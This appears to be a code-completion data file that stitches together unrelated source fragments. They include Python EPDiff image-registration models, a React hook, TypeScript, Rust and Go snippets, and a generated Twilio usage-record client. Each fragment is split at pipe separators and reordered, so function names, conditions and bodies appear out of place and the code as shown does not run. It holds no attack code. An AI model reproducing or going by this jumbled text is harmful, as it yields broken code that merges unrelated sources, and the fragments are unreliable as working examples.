return [self.rhs.rhs_advect_map_multiNC(x[0], u),self.rhs.rhs_lagrangian_evolve_map_multiNC(x[1], u)]
else:
return [self.rhs.rhs_advect_map_multiNC(x[0],u)]
class AdvectImage(ForwardModel):
"""
Forward model to advect an image using a transport equation: :math:`I_t + \\nabla I^Tv = 0`.
v is treated as an external argument and I is the state
"""
def __init__(self, sz, spacing, params=None):
super(AdvectImage, self).__init__(sz, spacing,params)
def u(self,t, pars, variables_from_optimizer=None):
"""
External input, to hold the velocity field
:param t: time (ignored; not time-dependent)
:param pars: assumes an n-D velocity field is passed as the only input argument
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: Simply returns this velocity field
"""
return pars['v']
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of transport equation: :math:`-\\nabla I^T v`
:param t: time (ignored; not time-dependent)
:param x: state, here the image, I, itself (supports multiple images and channels)
:param u: external input, will be the velocity field here
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [I]
"""
return [self.rhs.rhs_advect_image_multiNC(x[0],u)]
class EPDiffImage(ForwardModel):
"""
Forward model for the EPdiff equation. State is the momentum, m, and the image I:
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`I_t+\\nabla I^Tv=0`
"""
def __init__(self, sz, spacing, smoother, params=None):
super(EPDiffImage, self).__init__(sz, spacing,params)
self.smoother = smoother
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-\\nabla I^Tv`
:param t: time (ignored; not time-dependent)
:param x: state, here the vector momentum, m, and the image, I
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [m,I]
"""
# assume x[0] is m and x[1] is I for the state
m = x[0]
I = x[1]
v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'I': I}),variables_from_optimizer)
# print('max(|v|) = ' + str( v.abs().max() ))
return [self.rhs.rhs_epdiff_multiNC(m,v), self.rhs.rhs_advect_image_multiNC(I,v)]
class EPDiffMap(ForwardModel):
"""
Forward model for the EPDiff equation. State is the momentum, m, and the transform, :math:`\\phi`
(mapping the source image to the target image).
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`\\phi_t+D\\phi v=0`
"""
def __init__(self, sz, spacing, smoother, params=None,compute_inverse_map=False):
super(EPDiffMap, self).__init__(sz,spacing,params)
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
self.smoother = smoother
self.use_net = True if self.params['smoother']['type'] == 'adaptiveNet' else False
def debugging(self,input,t):
x = utils.checkNan(input)
if np.sum(x):
print("find nan at {} step".format(t))
print("flag m: {}, ".format(x[0]))
print("flag v: {},".format(x[1]))
print("flag phi: {},".format(x[2]))
print("flag new_m: {},".format(x[3]))
print("flag new_phi: {},".format(x[4]))
raise ValueError("nan error")
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm'
:math:`-D\\phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the image, vector momentum, m, and the map, :math:`\\phi`
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [m,phi]
"""
# assume x[0] is m and x[1] is phi for the state
m = x[0]
m = m.clamp(max=1., min=-1.)
phi = x[1]
if self.compute_inverse_map:
phi_inv = x[2]
| v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'phi':phi}),variables_from_optimizer)
else:
v = self.smoother.adaptive_smooth(m, phi, using_map=True)
# print('max(|v|) = ' + str( v.abs().max() ))
if self.compute_inverse_map:
ret_val= [self.rhs.rhs_epdiff_multiNC(m,v),
self.rhs.rhs_advect_map_multiNC(phi,v),
self.rhs.rhs_lagrangian_evolve_map_multiNC(phi_inv,v)]
else:
new_m = self.rhs.rhs_epdiff_multiNC(m,v)
new_phi = self.rhs.rhs_advect_map_multiNC(phi,v)
ret_val= [new_m, new_phi]
return ret_val
class EPDiffAdaptMap(ForwardModel):
"""
Forward model for the EPDiff equation. State is the momentum, m, and the transform, :math:`\\phi`
(mapping the source image to the target image).
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`\\phi_t+D\\phi v=0`
"""
def __init__(self, sz, spacing, smoother, params=None, compute_inverse_map=False, update_sm_by_advect= True, update_sm_with_interpolation=True,compute_on_initial_map=True):
super(EPDiffAdaptMap, self).__init__(sz, spacing, params)
from . import module_parameters as pars
from . import smoother_factory as sf
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
self.smoother = smoother
self.update_sm_by_advect = update_sm_by_advect
self.use_the_first_step_penalty = True
self.update_sm_with_interpolation = update_sm_with_interpolation
self.compute_on_initial_map=compute_on_initial_map
self.update_sm_weight=None
self.velocity_mask = None
self.debug_mode_on = False
s_m_params = pars.ParameterDict()
s_m_params['smoother']['type'] = 'gaussian'
s_m_params['smoother']['gaussian_std'] =self.params['smoother']['deep_smoother']['deep_network_local_weight_smoothing']
self.embedded_smoother = sf.SmootherFactory(sz[2:], spacing).create_smoother(
s_m_params)
""" if only take the first step penalty as the total penalty, otherwise accumluate the penalty"""
def debug_nan(self, input, t,name=''):
x = utils.checkNan([input])
if np.sum(x):
# print(input[0])
print("find nan at {} step, {} with number {}".format(t,name,x[0]))
raise ValueError("nan error")
def init_zero_sm_weight(self,sm_weight):
self.update_sm_weight = torch.zeros_like(sm_weight).detach()
def init_velocity_mask(self,velocity_mask):
self.velocity_mask = velocity_mask
def debug_distrib(self,var,name):
var = var.detach().cpu().numpy()
density,_= np.histogram(var,[-100,-10,-1,0,1,10,100],density=True)
print("{} distri:{}".format(name,density))
def f(self, t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm'
:math:`-D\\phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the image, vector momentum, m, and the map, :math:`\\phi`
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [m,phi]
"""
# assume x[0] is m and x[1] is phi for the state
m = x[0]
m=m.clamp(max=1., min=-1.)
phi = x[1]
return_val_name = []
sm_weight = None
if self.update_sm_by_advect:
if not self.update_sm_with_interpolation:
sm_weight_pre = x[2]
sm_weight = self.embedded_smoother.smooth(sm_weight_pre)
v, extra_ret = self.smoother.smooth(m, None, {'w':sm_weight},multi_output=True)
if self.velocity_mask is not None:
v = v* self.velocity_mask
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
new_sm_weight_pre = self.rhs.rhs_advect_map_multiNC(sm_weight_pre, v)
new_m = self.rhs.rhs_adapt_epdiff_wkw_multiNC(m, v, new_sm_weight_pre, extra_ret,
self.embedded_smoother)
ret_val = [new_m, new_phi,new_sm_weight_pre]
return_val_name =['new_m','new_phi','new_sm_weight']
else:
if self.compute_on_initial_map:
sm_weight = x[2]
sm_phi = x[3]
new_sm_weight = utils.compute_warped_image_multiNC(sm_weight, sm_phi, self.spacing, 1,
zero_boundary=False)
pre_weight = sm_weight
new_sm_weight = self.embedded_smoother.smooth(new_sm_weight)
#print('t{},m min, mean,max {} {} {}'.format(t,m.min().item(),m.mean().item(),m.max().item()))
v,extra_ret = self.smoother.smooth(m,None,{'w': new_sm_weight},multi_output=True)
if self.velocity_mask is not None:
v = v * self.velocity_mask
new_m = self.rhs.rhs_adapt_epdiff_wkw_multiNC(m,v,pre_weight,extra_ret,self.embedded_smoother)
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
new_sm_phi = self.rhs.rhs_advect_map_multiNC(sm_phi, v)
new_sm_weight = self.update_sm_weight.detach()
ret_val = [new_m, new_phi,new_sm_weight,new_sm_phi]
return_val_name = ['new_m', 'new_phi', 'new_sm_weight','new_sm_phi']
else: #todo just attention here is what we currently used
sm_weight = x[2]
new_sm_weight = utils.compute_warped_image_multiNC(sm_weight, phi, self.spacing, 1,
zero_boundary=False)
pre_weight = sm_weight
new_sm_weight = self.embedded_smoother.smooth(new_sm_weight)
v, extra_ret = self.smoother.smooth(m, None,{'w':new_sm_weight}, multi_output=True)
if self.velocity_mask is not None:
v = v * self.velocity_mask
new_m = self.rhs.rhs_adapt_epdiff_wkw_multiNC(m,v,pre_weight,extra_ret,self.embedded_smoother)
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
new_sm_weight = self.update_sm_weight.detach()
ret_val = [new_m, new_phi, new_sm_weight]
return_val_name = ['new_m', 'new_phi', 'new_sm_weight']
else:
if not t==0:
if self.use_the_first_step_penalty:
self.smoother.disable_penalty_computation()
else:
self.smoother.enable_accumulated_penalty()
I = utils.compute_warped_image_multiNC(pars['I0'], phi, self.spacing, 1,zero_boundary=True)
pars['I'] = I.detach() # TODO check whether I should be detached here
v = self.smoother.smooth(m, None, pars, variables_from_optimizer)
if self.velocity_mask is not None:
v = v * self.velocity_mask
new_m = self.rhs.rhs_epdiff_multiNC(m, v)
new_phi = self.rhs.rhs_advect_map_multiNC(phi, v)
ret_val = [new_m, new_phi]
return_val_name =['new_m','new_phi']
if self.debug_mode_on:
toshows = [m, v,phi]+ret_val if sm_weight is None else [m, v,phi]+ret_val +[sm_weight]
name = ['m', 'v','phi']+return_val_name if sm_weight is None else ['m', 'v','phi']+return_val_name +['sm_weight']
for i, toshow in enumerate(toshows):
print('t{},{} min, mean,max {} {} {}'.format(t, name[i], toshow.min().item(), toshow.mean().item(),
toshow.max().item()))
self.debug_distrib(toshow, name[i])
self.debug_nan(toshow,t,name[i])
return ret_val
# print('max(|v|) = ' + str( v.abs().max() ))
class EPDiffScalarMomentum(ForwardModel):
"""
Base class for scalar momentum EPDiff solutions. Defines a smoother that can be commonly used.
"""
def __init__(self, sz, spacing, smoother, params):
super(EPDiffScalarMomentum,self).__init__(sz,spacing,params)
self.smoother = smoother
class EPDiffScalarMomentumImage(EPDiffScalarMomentum):
"""
Forward model for the scalar momentum EPdiff equation. State is the scalar momentum, lam, and the image I
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:'m=\\lambda\\nabla I`
:math:`I_t+\\nabla I^Tv=0`
:math:`\\lambda_t + div(\\lambda v)=0`
"""
def __init__(self, sz, spacing, smoother, params=None):
super(EPDiffScalarMomentumImage, self).__init__(sz, spacing, smoother, params)
def f(self, t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-\\nabla I^Tv`
:math: `-div(\\lambda v)`
:param t: time (ignored; not time-dependent)
:param x: state, here the scalar momentum, lam, and the image, I, itself
:param u: no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [lam,I]
"""
# assume x[0] is \lambda and x[1] is I for the state
lam = x[0]
I = x[1]
# now compute the momentum
m = utils.compute_vector_momentum_from_scalar_momentum_multiNC(lam, I, self.sz, self.spacing)
v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'I':I}),variables_from_optimizer)
# advection for I, scalar-conservation law for lam
return [self.rhs.rhs_scalar_conservation_multiNC(lam, v), self.rhs.rhs_advect_image_multiNC(I, v)]
class EPDiffScalarMomentumMap(EPDiffScalarMomentum):
"""
Forward model for the scalar momentum EPDiff equation. State is the scalar momentum, lam, the image, I, and the transform, phi.
:math:`(m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`v=Km`
:math:`m=\\lambda\\nabla I`
:math:`I_t+\\nabla I^Tv=0`
:math:`\\lambda_t + div(\\lambda v)=0`
:math:`\\Phi_t+D\\Phi v=0`
"""
def __init__(self, sz, spacing, smoother, params=None, compute_inverse_map=False):
super(EPDiffScalarMomentumMap, self).__init__(sz,spacing, smoother, params)
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of the EPDiff equation:
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:math:`-\\nabla I^Tv`
:math:`-div(\\lambda v)`
:math:`-D\\Phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the scalar momentum, lam, the image, I, and the transform, :math:`\\phi`
:param u: ignored, no external input
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [lam,I,phi]
"""
# assume x[0] is lam and x[1] is I and x[2] is phi for the state
lam = x[0]
I = x[1]
phi = x[2]
if self.compute_inverse_map:
phi_inv = x[3]
# now compute the momentum
m = utils.compute_vector_momentum_from_scalar_momentum_multiNC(lam, I, self.sz, self.spacing)
# todo: replace this by phi again
#v = self.smoother.smooth(m,None,[phi,True],variables_from_optimizer)
v = self.smoother.smooth(m,None,utils.combine_dict(pars,{'I':I}),variables_from_optimizer)
if self.compute_inverse_map:
ret_val = [self.rhs.rhs_scalar_conservation_multiNC(lam,v),
self.rhs.rhs_advect_image_multiNC(I,v),
self.rhs.rhs_advect_map_multiNC(phi,v),
self.rhs.rhs_lagrangian_evolve_map_multiNC(phi_inv,v)]
else:
ret_val = [self.rhs.rhs_scalar_conservation_multiNC(lam,v),
self.rhs.rhs_advect_image_multiNC(I,v),
self.rhs.rhs_advect_map_multiNC(phi,v)]
return ret_val | if not self.use_net: |
useSingleState.js | const setFalse = () => setIsTrue(false);
return [isTrue, setTrue, setFalse];
}; | export default useStateHook => () => {
const [isTrue, setIsTrue] = useStateHook(false);
const setTrue = () => setIsTrue(true); |
|
IUserTokensRepository.ts | import UserToken from '../infra/typeorm/entities/UserToken'
| generate(user_id: string): Promise<UserToken>;
findByToken(token: string): Promise<UserToken | undefined>;
} | export default interface IUserTokensRepository { |
unix_mount_point.rs | // Take a look at the license at the top of the repository in the LICENSE file.
use crate::UnixMountPoint;
use glib::translate::*;
use std::mem;
impl UnixMountPoint {
#[cfg(any(unix, feature = "dox"))]
#[doc(alias = "g_unix_mount_points_get")]
pub fn | () -> (Vec<UnixMountPoint>, u64) {
unsafe {
let mut time_read = mem::MaybeUninit::uninit();
let ret = FromGlibPtrContainer::from_glib_full(ffi::g_unix_mount_points_get(
time_read.as_mut_ptr(),
));
let time_read = time_read.assume_init();
(ret, time_read)
}
}
#[doc(alias = "g_unix_mount_points_changed_since")]
pub fn is_changed_since(time: u64) -> bool {
unsafe { from_glib(ffi::g_unix_mount_points_changed_since(time)) }
}
}
| mount_points |
ArticleDetailParser.go | package parser
import (
"github.com/PuerkitoBio/goquery"
"io"
"jobbole_spider/basic_framework/engine"
)
type DetailItem struct {
Title string
Contents string
}
func ParseArticleDetail(reader io.Reader) engine.ParserResult {
doc, err := goquery.NewDocumentFromReader(reader)
if err != nil |
result := engine.ParserResult{}
var items []interface{}
title := doc.Find("div.entry-header").Find("h1").Text()
text := doc.Find("div.entry").Text()
detailItem := DetailItem{title, text}
items = append(result.Items, detailItem)
result.Items = items
return result
}
| {
panic(err)
} |
light.rs | use cglinalg::{
Vector3,
ScalarFloat,
};
#[derive(Copy, Clone, Debug, PartialEq)]
pub struct PointLight<S> {
pub ambient: Vector3<S>,
pub diffuse: Vector3<S>,
pub specular: Vector3<S>,
}
impl<S> PointLight<S> where S: ScalarFloat {
pub fn new(ambient: Vector3<S>, diffuse: Vector3<S>, specular: Vector3<S>) -> PointLight<S> |
}
| {
PointLight {
ambient: ambient,
diffuse: diffuse,
specular: specular,
}
} |
example.go | package main
import _ "crypto/md5"
func | () {
}
| main |
daily.py | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class DailyList(ListResource):
def __init__(self, version, account_sid):
"""
Initialize the DailyList
:param Version version: Version that contains the resource
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyList
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyList
"""
super(DailyList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, }
self._uri = '/Accounts/{account_sid}/Usage/Records/Daily.json'.format(**self._solution)
def stream(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Streams DailyInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param DailyInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.daily.DailyInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'])
def list(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Lists DailyInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param DailyInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.daily.DailyInstance]
"""
return list(self.stream(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
limit=limit,
page_size=page_size,
))
def page(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of DailyInstance records from the API.
Request is executed immediately
:param DailyInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date | :param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
"""
data = values.of({
'Category': category,
'StartDate': serialize.iso8601_date(start_date),
'EndDate': serialize.iso8601_date(end_date),
'IncludeSubaccounts': include_subaccounts,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(method='GET', uri=self._uri, params=data, )
return DailyPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of DailyInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return DailyPage(self._version, response, self._solution)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.DailyList>'
class DailyPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the DailyPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
"""
super(DailyPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of DailyInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
"""
return DailyInstance(self._version, payload, account_sid=self._solution['account_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.DailyPage>'
class DailyInstance(InstanceResource):
class Category(object):
A2P_REGISTRATION_FEES = "a2p-registration-fees"
AGENT_CONFERENCE = "agent-conference"
ANSWERING_MACHINE_DETECTION = "answering-machine-detection"
AUTHY_AUTHENTICATIONS = "authy-authentications"
AUTHY_CALLS_OUTBOUND = "authy-calls-outbound"
AUTHY_MONTHLY_FEES = "authy-monthly-fees"
AUTHY_PHONE_INTELLIGENCE = "authy-phone-intelligence"
AUTHY_PHONE_VERIFICATIONS = "authy-phone-verifications"
AUTHY_SMS_OUTBOUND = "authy-sms-outbound"
CALL_PROGESS_EVENTS = "call-progess-events"
CALLERIDLOOKUPS = "calleridlookups"
CALLS = "calls"
CALLS_CLIENT = "calls-client"
CALLS_GLOBALCONFERENCE = "calls-globalconference"
CALLS_INBOUND = "calls-inbound"
CALLS_INBOUND_LOCAL = "calls-inbound-local"
CALLS_INBOUND_MOBILE = "calls-inbound-mobile"
CALLS_INBOUND_TOLLFREE = "calls-inbound-tollfree"
CALLS_OUTBOUND = "calls-outbound"
CALLS_PAY_VERB_TRANSACTIONS = "calls-pay-verb-transactions"
CALLS_RECORDINGS = "calls-recordings"
CALLS_SIP = "calls-sip"
CALLS_SIP_INBOUND = "calls-sip-inbound"
CALLS_SIP_OUTBOUND = "calls-sip-outbound"
CALLS_TRANSFERS = "calls-transfers"
CARRIER_LOOKUPS = "carrier-lookups"
CONVERSATIONS = "conversations"
CONVERSATIONS_API_REQUESTS = "conversations-api-requests"
CONVERSATIONS_CONVERSATION_EVENTS = "conversations-conversation-events"
CONVERSATIONS_ENDPOINT_CONNECTIVITY = "conversations-endpoint-connectivity"
CONVERSATIONS_EVENTS = "conversations-events"
CONVERSATIONS_PARTICIPANT_EVENTS = "conversations-participant-events"
CONVERSATIONS_PARTICIPANTS = "conversations-participants"
CPS = "cps"
FLEX_USAGE = "flex-usage"
FRAUD_LOOKUPS = "fraud-lookups"
GROUP_ROOMS = "group-rooms"
GROUP_ROOMS_DATA_TRACK = "group-rooms-data-track"
GROUP_ROOMS_ENCRYPTED_MEDIA_RECORDED = "group-rooms-encrypted-media-recorded"
GROUP_ROOMS_MEDIA_DOWNLOADED = "group-rooms-media-downloaded"
GROUP_ROOMS_MEDIA_RECORDED = "group-rooms-media-recorded"
GROUP_ROOMS_MEDIA_ROUTED = "group-rooms-media-routed"
GROUP_ROOMS_MEDIA_STORED = "group-rooms-media-stored"
GROUP_ROOMS_PARTICIPANT_MINUTES = "group-rooms-participant-minutes"
GROUP_ROOMS_RECORDED_MINUTES = "group-rooms-recorded-minutes"
IMP_V1_USAGE = "imp-v1-usage"
LOOKUPS = "lookups"
MARKETPLACE = "marketplace"
MARKETPLACE_ALGORITHMIA_NAMED_ENTITY_RECOGNITION = "marketplace-algorithmia-named-entity-recognition"
MARKETPLACE_CADENCE_TRANSCRIPTION = "marketplace-cadence-transcription"
MARKETPLACE_CADENCE_TRANSLATION = "marketplace-cadence-translation"
MARKETPLACE_CAPIO_SPEECH_TO_TEXT = "marketplace-capio-speech-to-text"
MARKETPLACE_CONVRIZA_ABABA = "marketplace-convriza-ababa"
MARKETPLACE_DEEPGRAM_PHRASE_DETECTOR = "marketplace-deepgram-phrase-detector"
MARKETPLACE_DIGITAL_SEGMENT_BUSINESS_INFO = "marketplace-digital-segment-business-info"
MARKETPLACE_FACEBOOK_OFFLINE_CONVERSIONS = "marketplace-facebook-offline-conversions"
MARKETPLACE_GOOGLE_SPEECH_TO_TEXT = "marketplace-google-speech-to-text"
MARKETPLACE_IBM_WATSON_MESSAGE_INSIGHTS = "marketplace-ibm-watson-message-insights"
MARKETPLACE_IBM_WATSON_MESSAGE_SENTIMENT = "marketplace-ibm-watson-message-sentiment"
MARKETPLACE_IBM_WATSON_RECORDING_ANALYSIS = "marketplace-ibm-watson-recording-analysis"
MARKETPLACE_IBM_WATSON_TONE_ANALYZER = "marketplace-ibm-watson-tone-analyzer"
MARKETPLACE_ICEHOOK_SYSTEMS_SCOUT = "marketplace-icehook-systems-scout"
MARKETPLACE_INFOGROUP_DATAAXLE_BIZINFO = "marketplace-infogroup-dataaxle-bizinfo"
MARKETPLACE_KEEN_IO_CONTACT_CENTER_ANALYTICS = "marketplace-keen-io-contact-center-analytics"
MARKETPLACE_MARCHEX_CLEANCALL = "marketplace-marchex-cleancall"
MARKETPLACE_MARCHEX_SENTIMENT_ANALYSIS_FOR_SMS = "marketplace-marchex-sentiment-analysis-for-sms"
MARKETPLACE_MARKETPLACE_NEXTCALLER_SOCIAL_ID = "marketplace-marketplace-nextcaller-social-id"
MARKETPLACE_MOBILE_COMMONS_OPT_OUT_CLASSIFIER = "marketplace-mobile-commons-opt-out-classifier"
MARKETPLACE_NEXIWAVE_VOICEMAIL_TO_TEXT = "marketplace-nexiwave-voicemail-to-text"
MARKETPLACE_NEXTCALLER_ADVANCED_CALLER_IDENTIFICATION = "marketplace-nextcaller-advanced-caller-identification"
MARKETPLACE_NOMOROBO_SPAM_SCORE = "marketplace-nomorobo-spam-score"
MARKETPLACE_PAYFONE_TCPA_COMPLIANCE = "marketplace-payfone-tcpa-compliance"
MARKETPLACE_REMEETING_AUTOMATIC_SPEECH_RECOGNITION = "marketplace-remeeting-automatic-speech-recognition"
MARKETPLACE_TCPA_DEFENSE_SOLUTIONS_BLACKLIST_FEED = "marketplace-tcpa-defense-solutions-blacklist-feed"
MARKETPLACE_TELO_OPENCNAM = "marketplace-telo-opencnam"
MARKETPLACE_TRUECNAM_TRUE_SPAM = "marketplace-truecnam-true-spam"
MARKETPLACE_TWILIO_CALLER_NAME_LOOKUP_US = "marketplace-twilio-caller-name-lookup-us"
MARKETPLACE_TWILIO_CARRIER_INFORMATION_LOOKUP = "marketplace-twilio-carrier-information-lookup"
MARKETPLACE_VOICEBASE_PCI = "marketplace-voicebase-pci"
MARKETPLACE_VOICEBASE_TRANSCRIPTION = "marketplace-voicebase-transcription"
MARKETPLACE_VOICEBASE_TRANSCRIPTION_CUSTOM_VOCABULARY = "marketplace-voicebase-transcription-custom-vocabulary"
MARKETPLACE_WHITEPAGES_PRO_CALLER_IDENTIFICATION = "marketplace-whitepages-pro-caller-identification"
MARKETPLACE_WHITEPAGES_PRO_PHONE_INTELLIGENCE = "marketplace-whitepages-pro-phone-intelligence"
MARKETPLACE_WHITEPAGES_PRO_PHONE_REPUTATION = "marketplace-whitepages-pro-phone-reputation"
MARKETPLACE_WOLFARM_SPOKEN_RESULTS = "marketplace-wolfarm-spoken-results"
MARKETPLACE_WOLFRAM_SHORT_ANSWER = "marketplace-wolfram-short-answer"
MARKETPLACE_YTICA_CONTACT_CENTER_REPORTING_ANALYTICS = "marketplace-ytica-contact-center-reporting-analytics"
MEDIASTORAGE = "mediastorage"
MMS = "mms"
MMS_INBOUND = "mms-inbound"
MMS_INBOUND_LONGCODE = "mms-inbound-longcode"
MMS_INBOUND_SHORTCODE = "mms-inbound-shortcode"
MMS_MESSAGES_CARRIERFEES = "mms-messages-carrierfees"
MMS_OUTBOUND = "mms-outbound"
MMS_OUTBOUND_LONGCODE = "mms-outbound-longcode"
MMS_OUTBOUND_SHORTCODE = "mms-outbound-shortcode"
MONITOR_READS = "monitor-reads"
MONITOR_STORAGE = "monitor-storage"
MONITOR_WRITES = "monitor-writes"
NOTIFY = "notify"
NOTIFY_ACTIONS_ATTEMPTS = "notify-actions-attempts"
NOTIFY_CHANNELS = "notify-channels"
NUMBER_FORMAT_LOOKUPS = "number-format-lookups"
PCHAT = "pchat"
PCHAT_USERS = "pchat-users"
PEER_TO_PEER_ROOMS_PARTICIPANT_MINUTES = "peer-to-peer-rooms-participant-minutes"
PFAX = "pfax"
PFAX_MINUTES = "pfax-minutes"
PFAX_MINUTES_INBOUND = "pfax-minutes-inbound"
PFAX_MINUTES_OUTBOUND = "pfax-minutes-outbound"
PFAX_PAGES = "pfax-pages"
PHONENUMBERS = "phonenumbers"
PHONENUMBERS_CPS = "phonenumbers-cps"
PHONENUMBERS_EMERGENCY = "phonenumbers-emergency"
PHONENUMBERS_LOCAL = "phonenumbers-local"
PHONENUMBERS_MOBILE = "phonenumbers-mobile"
PHONENUMBERS_SETUPS = "phonenumbers-setups"
PHONENUMBERS_TOLLFREE = "phonenumbers-tollfree"
PREMIUMSUPPORT = "premiumsupport"
PROXY = "proxy"
PROXY_ACTIVE_SESSIONS = "proxy-active-sessions"
PSTNCONNECTIVITY = "pstnconnectivity"
PV = "pv"
PV_COMPOSITION_MEDIA_DOWNLOADED = "pv-composition-media-downloaded"
PV_COMPOSITION_MEDIA_ENCRYPTED = "pv-composition-media-encrypted"
